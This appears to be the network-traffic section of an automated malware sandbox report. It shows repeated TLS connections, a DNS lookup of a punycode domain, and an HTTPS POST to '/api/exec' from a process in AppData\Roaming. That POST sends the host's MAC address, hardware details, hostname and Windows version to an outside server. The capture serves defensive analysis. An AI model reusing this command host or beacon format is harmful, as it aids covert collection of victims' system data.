Nov 19, 2024 19:15:43.749193907 CET  443  50081  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:43.749355078 CET  50081  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:43.749866962 CET  50081  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:43.749908924 CET  443  50081  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:44.551443100 CET  443  50081  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:44.551522017 CET  50081  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:44.553052902 CET  50081  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:44.553071022 CET  443  50081  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:44.553375959 CET  443  50081  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:44.554313898 CET  50081  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:44.554605961 CET  50081  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:44.554630995 CET  443  50081  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:44.554763079 CET  443  50081  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:44.554795980 CET  443  50081  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:44.554853916 CET  50081  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:44.554970026 CET  50081  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:44.705046892 CET  50084  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:44.705077887 CET  443  50084  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:44.705236912 CET  50084  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:44.705707073 CET  50084  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:44.705713987 CET  443  50084  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:45.497013092 CET  443  50084  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:45.497128010 CET  50084  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:45.498410940 CET  50084  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:45.498424053 CET  443  50084  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:45.498856068 CET  443  50084  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:45.501861095 CET  50084  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:45.511243105 CET  50084  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:45.511276960 CET  443  50084  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:45.511413097 CET  443  50084  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:45.511445999 CET  443  50084  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:45.511499882 CET  50084  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:45.511523008 CET  50084  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:45.524977922 CET  50087  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:45.525015116 CET  443  50087  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:45.525069952 CET  50087  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:45.525491953 CET  50087  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:45.525507927 CET  443  50087  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:46.398545980 CET  443  50087  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:46.398694992 CET  50087  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:46.400288105 CET  50087  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:46.400302887 CET  443  50087  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:46.400583029 CET  443  50087  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:46.401530027 CET  50087  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:46.403209925 CET  50087  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:46.403251886 CET  443  50087  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:46.403383017 CET  443  50087  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:46.403410912 CET  443  50087  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:46.403449059 CET  50087  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:46.403683901 CET  50087  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:46.439555883 CET  50090  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:46.439656019 CET  443  50090  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:46.439734936 CET  50090  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:46.440783024 CET  50090  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:46.440814972 CET  443  50090  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:47.243415117 CET  443  50090  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:47.243480921 CET  50090  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:47.244827986 CET  50090  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:47.244837999 CET  443  50090  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:47.245078087 CET  443  50090  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:47.245790005 CET  50090  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:47.246144056 CET  50090  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:47.246207952 CET  443  50090  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:47.246239901 CET  50090  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:47.246556044 CET  443  50090  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:47.246632099 CET  443  50090  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:47.246692896 CET  50090  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:47.246707916 CET  50090  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:47.262669086 CET  50093  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:47.262702942 CET  443  50093  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:47.262809038 CET  50093  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:47.263484001 CET  50093  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:47.263501883 CET  443  50093  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:48.071676016 CET  443  50093  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:48.071775913 CET  50093  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:48.073105097 CET  50093  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:48.073113918 CET  443  50093  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:48.073363066 CET  443  50093  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:48.073898077 CET  50093  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:48.074888945 CET  50093  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:48.074908972 CET  443  50093  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:48.075014114 CET  443  50093  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:48.075016022 CET  50093  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:48.075047016 CET  443  50093  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:48.075087070 CET  50093  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:48.075103045 CET  50093  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:48.162893057 CET  50096  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:48.162945032 CET  443  50096  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:48.163135052 CET  50096  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:48.163559914 CET  50096  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:48.163572073 CET  443  50096  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:48.961808920 CET  443  50096  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:48.961916924 CET  50096  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:48.963186026 CET  50096  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:48.963197947 CET  443  50096  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:48.963512897 CET  443  50096  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:48.964267015 CET  50096  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:48.964615107 CET  50096  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:48.964647055 CET  443  50096  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:48.964768887 CET  443  50096  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:48.964792967 CET  443  50096  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:48.964840889 CET  50096  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:49.060508013 CET  50099  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:49.060573101 CET  443  50099  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:49.060648918 CET  50099  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:49.062393904 CET  50099  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:49.062431097 CET  443  50099  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:49.872457981 CET  443  50099  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:49.872545004 CET  50099  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:49.884567022 CET  50099  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:49.884591103 CET  443  50099  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:49.884924889 CET  443  50099  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:49.885518074 CET  50099  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:49.886390924 CET  50099  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:49.886429071 CET  443  50099  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:49.886547089 CET  443  50099  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:49.886548042 CET  50099  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:49.886578083 CET  443  50099  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:49.886666059 CET  50099  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:49.886666059 CET  50099  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:49.946763992 CET  50102  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:49.946866989 CET  443  50102  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:49.946955919 CET  50102  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:49.947308064 CET  50102  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:49.947355986 CET  443  50102  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:50.743228912 CET  443  50102  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:50.743335962 CET  50102  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:50.744590044 CET  50102  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:50.744599104 CET  443  50102  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:50.744827986 CET  443  50102  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:50.745378971 CET  50102  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:50.746567965 CET  50102  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:50.746594906 CET  443  50102  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:50.746686935 CET  443  50102  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:50.746706963 CET  443  50102  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:50.746766090 CET  50102  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:50.746787071 CET  50102  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:50.823043108 CET  50105  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:50.823074102 CET  443  50105  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:50.823285103 CET  50105  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:50.823734045 CET  50105  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:50.823741913 CET  443  50105  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:51.570497036 CET  443  50105  212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:51.570954084 CET  50105  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:51.571886063 CET  50105  443  192.168.2.5  212.193.169.65
Nov 19, 2024 19:15:51.571901083 CET  443  50105  212.193.169.65  192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:51.572124004 CET44350105212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:51.573199987 CET50105443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:51.573199987 CET50105443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:51.573257923 CET44350105212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:51.573363066 CET44350105212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:51.573385954 CET44350105212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:51.573513985 CET50105443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:51.573513985 CET50105443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:51.581069946 CET50108443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:51.581110001 CET44350108212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:51.581167936 CET50108443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:51.581558943 CET50108443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:51.581572056 CET44350108212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:52.435343027 CET44350108212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:52.435411930 CET50108443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:52.436784029 CET50108443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:52.436799049 CET44350108212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:52.437040091 CET44350108212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:52.437650919 CET50108443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:52.438057899 CET50108443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:52.438083887 CET44350108212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:52.438141108 CET50108443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:52.438180923 CET44350108212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:52.438206911 CET44350108212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:52.438247919 CET50108443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:52.438266039 CET50108443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:52.446624994 CET50111443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:52.446671009 CET44350111212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:52.446757078 CET50111443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:52.447170973 CET50111443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:52.447180033 CET44350111212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:53.162283897 CET44350111212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:53.162354946 CET50111443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:53.163671017 CET50111443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:53.163681984 CET44350111212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:53.163923025 CET44350111212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:53.164536953 CET50111443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:53.166465998 CET50111443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:53.166492939 CET44350111212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:53.166539907 CET50111443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:53.166605949 CET44350111212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:53.166629076 CET44350111212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:53.166670084 CET50111443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:53.166690111 CET50111443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:53.252780914 CET50114443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:53.252818108 CET44350114212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:53.252924919 CET50114443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:53.253505945 CET50114443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:53.253515959 CET44350114212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:54.051851988 CET44350114212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:54.051963091 CET50114443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:54.053200960 CET50114443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:54.053209066 CET44350114212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:54.053992987 CET44350114212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:54.054805994 CET50114443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:54.055061102 CET50114443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:54.055131912 CET44350114212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:54.055260897 CET44350114212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:54.055329084 CET50114443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:54.055344105 CET50114443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:54.127002954 CET50117443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:54.127048016 CET44350117212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:54.127276897 CET50117443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:54.127861977 CET50117443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:54.127887964 CET44350117212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:54.849766016 CET44350117212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:54.849946976 CET50117443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:54.851140976 CET50117443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:54.851146936 CET44350117212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:54.851398945 CET44350117212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:54.852246046 CET50117443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:54.852768898 CET50117443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:54.852798939 CET44350117212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:54.852835894 CET50117443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:54.852900982 CET44350117212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:54.852930069 CET44350117212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:54.853010893 CET50117443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:54.853024006 CET50117443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:54.860214949 CET50120443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:54.860260963 CET44350120212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:54.860403061 CET50120443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:54.860810995 CET50120443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:54.860824108 CET44350120212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:55.662620068 CET44350120212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:55.662698984 CET50120443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:55.665652990 CET50120443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:55.665658951 CET44350120212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:55.666318893 CET44350120212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:55.666871071 CET50120443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:55.667260885 CET50120443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:55.667288065 CET44350120212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:55.667397022 CET44350120212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:55.667423010 CET44350120212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:55.667506933 CET50120443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:55.751339912 CET50120443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:55.761217117 CET50123443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:55.761315107 CET44350123212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:55.761394024 CET50123443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:55.761806965 CET50123443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:55.761842012 CET44350123212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:56.556822062 CET44350123212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:56.556907892 CET50123443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:56.558048964 CET50123443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:56.558062077 CET44350123212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:56.558449030 CET44350123212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:56.559092045 CET50123443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:56.559348106 CET50123443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:56.559386015 CET44350123212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:56.559479952 CET44350123212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:56.559497118 CET50123443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:56.559505939 CET44350123212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:56.559515953 CET44350123212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:56.559535027 CET50123443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:56.559590101 CET50123443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:56.559665918 CET50123443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:56.595433950 CET50126443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:56.595515013 CET44350126212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:56.595797062 CET50126443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:56.596304893 CET50126443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:56.596339941 CET44350126212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:57.392353058 CET44350126212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:57.392524958 CET50126443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:57.394120932 CET50126443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:57.394143105 CET44350126212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:57.394404888 CET44350126212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:57.395426989 CET50126443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:57.395827055 CET50126443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:57.395870924 CET44350126212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:57.395977020 CET44350126212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:57.396002054 CET44350126212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:57.396018982 CET50126443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:57.396047115 CET44350126212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:57.396074057 CET50126443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:57.396123886 CET50126443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:57.396123886 CET50126443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:57.467752934 CET50129443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:57.467809916 CET44350129212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:57.467895031 CET50129443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:57.468364000 CET50129443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:57.468378067 CET44350129212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:58.194788933 CET44350129212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:58.194880962 CET50129443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:58.196085930 CET50129443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:58.196099997 CET44350129212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:58.196501017 CET44350129212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:58.197036028 CET50129443192.168.2.5212.193.169.65
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 19, 2024 19:15:12.194583893 CET | 60183 | 53 | 192.168.2.5 | 1.1.1.1
Nov 19, 2024 19:15:13.042112112 CET | 53 | 60183 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 19, 2024 19:15:12.194583893 CET | 192.168.2.5 | 1.1.1.1 | 0x8c62 | Standard query (0) | id.xn--80akicokc0aablc.xn--p1ai | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 19, 2024 19:15:13.042112112 CET | 1.1.1.1 | 192.168.2.5 | 0x8c62 | No error (0) | id.xn--80akicokc0aablc.xn--p1ai | (none) | 212.193.169.65 | A (IP address) | IN (0x0001) | false
• id.xn--80akicokc0aablc.xn--p1ai:443
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49982 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 18:15:14 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 18:15:14 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49985 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe
Timestamp | Bytes transferred | Direction | Data
